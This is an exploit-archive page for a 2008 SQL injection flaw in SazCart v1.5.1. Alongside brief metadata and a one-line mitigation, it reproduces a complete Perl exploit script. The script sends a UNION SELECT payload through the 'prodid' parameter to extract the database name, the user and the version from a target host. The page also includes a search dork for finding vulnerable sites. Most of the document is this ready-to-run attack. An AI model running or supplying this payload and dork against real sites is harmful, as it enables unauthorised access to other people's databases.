SazCart - exploit.company

vendor:

SazCart

by:

JosS

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: SazCart

Affected Version From: v1.5.1

Affected Version To: v1.5.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SazCart <= v1.5.1 (details&prodid) Remote SQL Injection Exploit

This exploit allows an attacker to inject malicious SQL code into the vulnerable SazCart application. The vulnerable parameter is the 'prodid' parameter in the 'details' page. By exploiting this vulnerability, an attacker can gain access to the database, user, and version information.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#!/usr/bin/perl

# SazCart <= v1.5.1 (details&prodid) Remote SQL Injection Exploit
# HomePage: http://www.sazcart.com
# Discovered & Coded by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team / Sys - Project / EspSeC
# http://www.spanish-hackers.com
# rgod forever :D

# Dork: "Powered by SazCart"


print "\t\t########################################################\n\n";
print "\t\t#   SazCart <= v1.5.1 - Remote SQL Injection Exploit   #\n\n";
print "\t\t#                       by JosS                        #\n\n";
print "\t\t########################################################\n\n";

use strict;
use LWP::UserAgent;

my $victim = $ARGV[0];

 if(!$ARGV[0]) {
    print "\n[x] SazCart <= v1.5.1 - Remote SQL Injection Exploit\n";
    print "[x] written by JosS - sys-project[at]hotmail.com\n";
    print "[x] usage: perl xpl.pl [host]\n";
    print "[x] example: http://localhost/path/\n\n";
    exit(1);
 }
 
    print "\n[+] Exploiting...\n";
    my $cnx = LWP::UserAgent->new() or die;
    my $go=$cnx->get($victim."?details&prodid=1'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4/*");
    if ($go->content =~ m/Price<\/b>\:(.*?)\<br/ms)
 {
        print "[+] $1\n\n";
    } else {
        print "\n[-] exploit failed\n";
    }

# milw0rm.com [2008-05-09]